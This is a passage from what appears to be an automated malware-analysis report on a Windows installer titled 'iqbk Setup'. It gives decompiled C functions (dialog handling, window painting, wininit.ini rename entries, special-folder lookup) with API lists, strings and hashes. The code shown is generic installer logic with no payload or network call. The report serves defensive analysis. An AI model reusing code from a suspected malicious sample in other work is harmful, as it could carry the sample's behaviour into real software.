				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x76c0c0
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x76a73c
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x764fc8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}

0x00403fdb
0x00404101
0x0040415d
0x00404161
0x00404238
0x0040423a
0x0040423a
0x00404240
0x00404240
0x00404243
0x00000000
0x0040424a
0x0040416f
0x00404171
0x0040417b
0x00404186
0x00404189
0x0040418c
0x00404197
0x0040419a
0x004041a1
0x004041af
0x004041c7
0x004041da
0x004041ea
0x004041ec
0x004041ec
0x004041a1
0x004041f6
0x00000000
0x00404201
0x00404205
0x00404216
0x00404216
0x0040421c
0x0040422a
0x0040422a
0x00000000
0x0040422e
0x004041f6
0x0040410c
0x00000000
0x00404120
0x00404126
0x0040412c
0x00000000
0x00000000
0x00404151
0x00404153
0x00404158
0x00000000
0x00404158
0x0040410c
0x00403fe1
0x00403fe4
0x00403fe9
0x00403feb
0x00403ffa
0x00403ffa
0x00403ffc
0x00404001
0x00404004
0x00404006
0x0040400b
0x00404014
0x0040401a
0x00404026
0x00404029
0x00404032
0x00404037
0x0040403a
0x0040403f
0x00404056
0x0040405d
0x00404070
0x00404073
0x00404088
0x0040408a
0x0040408f
0x00404094
0x00404099
0x00404099
0x004040a8
0x004040b7
0x004040b9
0x004040cf
0x004040de
0x004040e0
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
GetDlgItem.USER32 ref: 0040406A
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
GetSysColor.USER32(?), ref: 00404099
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
lstrlenA.KERNEL32(?), ref: 004040C1
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
GetDlgItem.USER32 ref: 00404141
SendMessageA.USER32(00000000), ref: 00404144
GetDlgItem.USER32 ref: 0040416F
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
LoadCursorA.USER32 ref: 004041BE
SetCursor.USER32(00000000), ref: 004041C7
ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
LoadCursorA.USER32 ref: 004041E7
SetCursor.USER32(00000000), ref: 004041EA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A

Strings

TclpOwkq, xrefs: 0040419A
N, xrefs: 0040415D
open, xrefs: 004041D2

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$TclpOwkq$open
API String ID: 3615053054-1106227724
Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x764fc8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "iqbk Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0x20406
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,iqbk Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

iqbk Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$iqbk Setup
API String ID: 941294808-1724507328
Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x764fc8
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x0040591b
0x00405922
0x00405926
0x0040592f
0x00405933
0x00405a72
0x00405a72
0x00000000
0x00405a72
0x00405933
0x0040593f
0x00405955
0x0040597d
0x00405988
0x0040598c
0x004059ac
0x004059ae
0x004059b3
0x004059bd
0x004059ca
0x004059cf
0x004059d4
0x004059d8
0x00000000
0x00000000
0x004059e7
0x004059e9
0x004059f6
0x004059fa
0x00405a6b
0x00405a6c
0x00000000
0x00405a16
0x00405a23
0x00405a88
0x00405a8f
0x00405a36
0x00405a36
0x00405a38
0x00405a41
0x00405a4c
0x00405a5e
0x00405a65
0x00000000
0x00405a65
0x00405a91
0x00405a92
0x00405a97
0x00405a99
0x00405aa6
0x00405aa6
0x00405aaa
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a9b
0x00405a9b
0x00405a9e
0x00405aa1
0x00405aa2
0x00000000
0x00405a9b
0x00405a2e
0x00405a33
0x00000000
0x00405a33
0x004059fa
0x00405957
0x00405962
0x0040596b
0x0040596f
0x00000000
0x00000000
0x0040596f
0x00405a7c

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
wsprintfA.USER32 ref: 004059A6
GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
GlobalFree.KERNEL32 ref: 00405A65
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C

Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Strings

[Rename], xrefs: 00405A16, 00405A28
%s=%s, xrefs: 0040599C

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3445103937-1727408572
Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x76c0c0
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x76a73c
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x73951340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}

0x00405be9
0x00405be9
0x00405be9
0x00405bef
0x00405bf4
0x00405bf6
0x00405c05
0x00405c05
0x00405c07
0x00405c10
0x00405c12
0x00405c17
0x00405c1a
0x00405c1b
0x00405c22
0x00405c24
0x00405c2a
0x00405c2d
0x00405c2d
0x00405e06
0x00405e06
0x00405e0a
0x00000000
0x00000000
0x00405c3a
0x00405c40
0x00000000
0x00000000
0x00405c46
0x00405c47
0x00405c4a
0x00405c4d
0x00405df9
0x00405e03
0x00405e05
0x00405e05
0x00405dfb
0x00405dfd
0x00405dff
0x00405e00
0x00405e00
0x00000000
0x00405df9
0x00405c53
0x00405c57
0x00405c67
0x00405c6b
0x00405c72
0x00405c75
0x00405c79
0x00405c7f
0x00405c82
0x00405c85
0x00405c88
0x00405da3
0x00405da6
0x00405dd6
0x00405dd9
0x00405dde
0x00405de2
0x00405de2
0x00405de7
0x00405de8
0x00405ded
0x00405df0
0x00405df2
0x00000000
0x00405df2
0x00405da8
0x00405dab
0x00405dc0
0x00405dc7
0x00405dad
0x00405db4
0x00405db4
0x00405dcf
0x00405dd2
0x00405d9b
0x00405d9c
0x00405d9c
0x00000000
0x00405dd2
0x00405c90
0x00405c91
0x00405c97
0x00405c99
0x00405cb3
0x00405cb3
0x00405cba
0x00405cba
0x00405cc1
0x00405cc5
0x00405cc5
0x00405cc6
0x00405cc8
0x00405d01
0x00405d04
0x00405d14
0x00405d17
0x00405d1f
0x00405d25
0x00405d25
0x00405d81
0x00405d81
0x00405d83
0x00000000
0x00000000
0x00405d29
0x00405d30
0x00405d31
0x00405d33
0x00405d4d
0x00405d5b
0x00405d61
0x00405d63
0x00405d7e
0x00405d7e
0x00405d7e
0x00000000
0x00405d7e
0x00405d69
0x00405d74
0x00405d7a
0x00405d7c
0x00000000
0x00000000
0x00000000
0x00405d7c
0x00405d35
0x00405d38
0x00000000
0x00000000
0x00405d47
0x00405d49
0x00405d4b
0x00000000
0x00000000
0x00000000
0x00405d4b
0x00000000
0x00405d81
0x00405d0c
0x00000000
0x00405cca
0x00405ccf
0x00405ce5
0x00405cea
0x00405ced
0x00405d8a
0x00405d8a
0x00405d8e
0x00405d96
0x00405d96
0x00000000
0x00405d8e
0x00405cf7
0x00405d85
0x00405d85
0x00405d88
0x00000000
0x00000000
0x00000000
0x00405d88
0x00405cc8
0x00405c9b
0x00405c9f
0x00000000
0x00000000
0x00405ca1
0x00405ca5
0x00000000
0x00000000
0x00405ca7
0x00405cab
0x00000000
0x00405cad
0x00405cad
0x00000000
0x00405cad
0x00405cab
0x00405e10
0x00405e1a
0x00405e26
0x00405e26
0x00000000

APIs

GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
GetSystemDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D0C
GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
SHGetSpecialFolderLocation.SHELL32(?,0041988C), ref: 00405D5B
SHGetPathFromIDListA.SHELL32(0041988C,TclpOwkq), ref: 00405D69
CoTaskMemFree.OLE32(0041988C), ref: 00405D74
lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8

Strings

TclpOwkq, xrefs: 00405C12, 00405CD9, 00405CF6, 00405D0B, 00405D1E, 00405D3A, 00405D65, 00405D95, 00405D9B, 00405DB3, 00405DC6, 00405DE1, 00405DE7, 00405DF2, 00405E1C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D90
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDB

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-487370903
Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

